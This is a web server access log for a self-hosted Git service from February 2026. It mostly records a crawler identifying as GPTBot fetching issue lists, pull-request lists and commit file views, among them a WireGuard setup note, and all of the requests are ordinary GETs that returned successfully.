"/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 157.245.110.238] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[17/Feb/2026:19:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 157.245.110.238] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/" -[17/Feb/2026:19:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15195] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15196] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15193] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:19:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33925] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:17:08 +0000] 